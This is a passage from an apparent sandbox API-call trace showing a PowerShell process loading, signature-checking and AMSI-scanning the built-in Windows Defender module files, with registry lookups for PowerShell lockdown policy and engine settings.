(lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0263.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e418) returned 1 [0263.184] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x23dd590 | out: lpFileInformation=0x23dd590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x3cdd0a8a, ftLastAccessTime.dwHighDateTime=0x1d94216, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d)) returned 1 [0263.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e3c8) returned 1 [0263.185] CoCreateGuid (in: pguid=0x1b83e6d8 | out: pguid=0x1b83e6d8*(Data1=0x11bf80a, Data2=0x7e95, Data3=0x4412, Data4=([0]=0xac, [1]=0x0, [2]=0xcb, [3]=0xed, [4]=0x7a, [5]=0xad, [6]=0xfe, [7]=0x40))) returned 0x0 [0263.203] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x794 [0263.203] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x79c [0263.204] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b8 [0263.204] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7bc [0263.204] SetEvent (hEvent=0x7bc) returned 1 [0263.204] SetEvent (hEvent=0x794) returned 1 [0263.204] SetEvent (hEvent=0x79c) returned 1 [0263.204] SetEvent (hEvent=0x7b8) returned 1 [0263.207] AmsiCloseSession () returned 0x7fffb444c2b0 [0263.218] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7c0 [0263.219] SetThreadUILanguage (LangId=0x0) returned 0x409 [0263.487] EtwEventActivityIdControl () returned 0x0 [0263.487] EtwEventActivityIdControl () returned 0x0 [0263.487] EtwEventActivityIdControl () returned 0x0 [0263.610] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0263.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83dc78) returned 1 [0263.611] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b83dfa0 | out: lpFileInformation=0x1b83dfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x3cdd0a8a, ftLastAccessTime.dwHighDateTime=0x1d94216, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d)) returned 1 [0263.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83dc28) returned 1 [0263.612] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0263.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.719] CoTaskMemAlloc (cb=0x20c) returned 0x1a8c6200 [0263.719] GetSystemDirectoryW (in: lpBuffer=0x1a8c6200, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.719] CoTaskMemFree (pv=0x1a8c6200) [0263.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0263.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0263.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83d808) returned 1 [0263.719] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83db30 | out: lpFileInformation=0x1b83db30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0263.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83d7b8) returned 1 [0263.719] GetSystemInfo (in: lpSystemInfo=0x1b83dbb0 | out: lpSystemInfo=0x1b83dbb0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0263.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83dab8 | out: phkResult=0x1b83dab8*=0x788) returned 0x0 [0263.720] RegQueryValueExW (in: hKey=0x788, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83db08, lpData=0x0, lpcbData=0x1b83db00*=0x0 | out: lpType=0x1b83db08*=0x0, lpData=0x0, lpcbData=0x1b83db00*=0x0) returned 0x2 [0263.720] RegCloseKey (hKey=0x788) returned 0x0 [0263.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83da28) returned 1 [0263.765] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x788 [0263.765] GetFileType (hFile=0x788) returned 0x1 [0263.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83d998) returned 1 [0263.765] GetFileType (hFile=0x788) returned 0x1 [0263.765] GetACP () returned 0x4e4 [0263.774] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83d9b8*=0) returned 0x0 [0263.774] ReadFile (in: hFile=0x788, lpBuffer=0x241bc60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83da38, lpOverlapped=0x0 | out: lpBuffer=0x241bc60*, lpNumberOfBytesRead=0x1b83da38*=0x1000, lpOverlapped=0x0) returned 1 [0263.778] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83d9b8*=0) returned 0x1000 [0263.779] ReadFile (in: hFile=0x788, lpBuffer=0x241bc60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83da38, lpOverlapped=0x0 | out: lpBuffer=0x241bc60*, lpNumberOfBytesRead=0x1b83da38*=0x1000, lpOverlapped=0x0) returned 1 [0263.779] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83d9b8*=0) returned 0x2000 [0263.779] ReadFile (in: hFile=0x788, lpBuffer=0x241bc60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83da38, lpOverlapped=0x0 | out: lpBuffer=0x241bc60*, lpNumberOfBytesRead=0x1b83da38*=0x1000, lpOverlapped=0x0) returned 1 [0263.780] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83d9b8*=0) returned 0x3000 [0263.780] ReadFile (in: hFile=0x788, lpBuffer=0x241bc60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83da38, lpOverlapped=0x0 | out: lpBuffer=0x241bc60*, lpNumberOfBytesRead=0x1b83da38*=0x62d, lpOverlapped=0x0) returned 1 [0263.780] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83d9b8*=0) returned 0x362d [0263.780] ReadFile (in: hFile=0x788, lpBuffer=0x241b1dd, nNumberOfBytesToRead=0x1d3, lpNumberOfBytesRead=0x1b83da38, lpOverlapped=0x0 | out: lpBuffer=0x241b1dd*, lpNumberOfBytesRead=0x1b83da38*=0x0, lpOverlapped=0x0) returned 1 [0263.780] SetFilePointer (in: hFile=0x788, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b83d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b83d9b8*=0) returned 0x362d [0263.780] ReadFile (in: hFile=0x788, lpBuffer=0x241bc60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b83da38, lpOverlapped=0x0 | out: lpBuffer=0x241bc60*, lpNumberOfBytesRead=0x1b83da38*=0x0, lpOverlapped=0x0) returned 1 [0263.780] CoTaskMemAlloc (cb=0x20c) returned 0x1a8c6200 [0263.780] GetSystemDirectoryW (in: lpBuffer=0x1a8c6200, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0263.781] CoTaskMemFree (pv=0x1a8c6200) [0263.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0263.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0263.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83d6f8) returned 1 [0263.781] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83da20 | out: lpFileInformation=0x1b83da20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0263.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83d6a8) returned 1 [0263.781] GetSystemInfo (in: lpSystemInfo=0x1b83daa0 | out: lpSystemInfo=0x1b83daa0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0263.782] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83d9a8 | out: phkResult=0x1b83d9a8*=0x7c8) returned 0x0 [0263.782] RegQueryValueExW (in: hKey=0x7c8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83d9f8, lpData=0x0, lpcbData=0x1b83d9f0*=0x0 | out: lpType=0x1b83d9f8*=0x0, lpData=0x0, lpcbData=0x1b83d9f0*=0x0) returned 0x2 [0263.782] RegCloseKey (hKey=0x7c8) returned 0x0 [0263.782] CloseHandle (hObject=0x788) returned 1 [0263.797] CoCreateGuid (in: pguid=0x1b83db18 | out: pguid=0x1b83db18*(Data1=0xf8c0cb3e, Data2=0x7182, Data3=0x4c97, Data4=([0]=0xad, [1]=0x45, [2]=0x57, [3]=0xd3, [4]=0x3d, [5]=0x9a, [6]=0x70, [7]=0x94))) returned 0x0 [0263.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83d208) returned 1 [0263.851] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b83d530 | out: lpFileInformation=0x1b83d530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26331504, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d)) returned 1 [0263.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83d1b8) returned 1 [0263.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83d0c8) returned 1 [0263.852] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b83d3f0 | out: lpFileInformation=0x1b83d3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26331504, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d)) returned 1 [0263.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83d078) returned 1 [0263.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0263.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0263.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83d2c8) returned 1 [0263.852] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x788 [0263.852] GetFileType (hFile=0x788) returned 0x1 [0263.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83d238) returned 1 [0263.853] GetFileType (hFile=0x788) returned 0x1 [0263.853] WTGetSignatureInfo () returned 0x0 [0264.121] CertDuplicateCertificateContext (pCertContext=0x1a8e05d0) returned 0x1a8e05d0 [0264.121] CryptCATHandleFromStore () returned 0x1aa11890 [0264.121] WTHelperGetProvSignerFromChain () returned 0x1aa11ed0 [0264.121] WTHelperGetProvCertFromChain () returned 0x1aa11250 [0264.122] CertDuplicateCertificateContext (pCertContext=0x1a8df850) returned 0x1a8df850 [0264.122] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83d338 | out: phkResult=0x1b83d338*=0x7d0) returned 0x0 [0264.122] RegQueryValueExW (in: hKey=0x7d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83d388, lpData=0x0, lpcbData=0x1b83d380*=0x0 | out: lpType=0x1b83d388*=0x1, lpData=0x0, lpcbData=0x1b83d380*=0x56) returned 0x0 [0264.122] RegQueryValueExW (in: hKey=0x7d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83d388, lpData=0x243a0c8, lpcbData=0x1b83d380*=0x56 | out: lpType=0x1b83d388*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b83d380*=0x56) returned 0x0 [0264.123] RegCloseKey (hKey=0x7d0) returned 0x0 [0264.123] CoTaskMemAlloc (cb=0x10) returned 0x1ace7a50 [0264.123] CoTaskMemAlloc (cb=0x50) returned 0x1acc7990 [0264.123] WinVerifyTrust () returned 0x0 [0264.123] CoTaskMemFree (pv=0x1acc7990) [0264.123] CoTaskMemFree (pv=0x1ace7a50) [0264.123] CertFreeCertificateContext (pCertContext=0x1a8e05d0) returned 1 [0264.123] CloseHandle (hObject=0x788) returned 1 [0264.124] AmsiOpenSession () returned 0x0 [0264.124] AmsiScanBuffer () returned 0x80070015 [0264.607] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\en-US\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\en-us\\defender.psd1")) returned 0xffffffff [0264.608] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\en\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\en\\defender.psd1")) returned 0xffffffff [0264.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0264.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0264.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0264.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x3c, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0264.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0264.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\PSGetModuleInfo.xml", nBufferLength=0x50, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x4f [0264.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83d048) returned 1 [0264.826] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b83d370 | out: lpFileInformation=0x1b83d370*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0264.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83cff8) returned 1 [0264.831] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpcomputerstatus.cdxml")) returned 0x20 [0264.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x58 [0264.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", nBufferLength=0x58, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpComputerStatus.cdxml", lpFilePart=0x0) returned 0x57 [0264.832] CoTaskMemAlloc (cb=0x20c) returned 0x1a8c6200 [0264.832] GetSystemDirectoryW (in: lpBuffer=0x1a8c6200, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0264.832] CoTaskMemFree (pv=0x1a8c6200) [0264.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0264.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0264.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9f8) returned 1 [0264.832] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd20 | out: lpFileInformation=0x1b83cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0264.832] 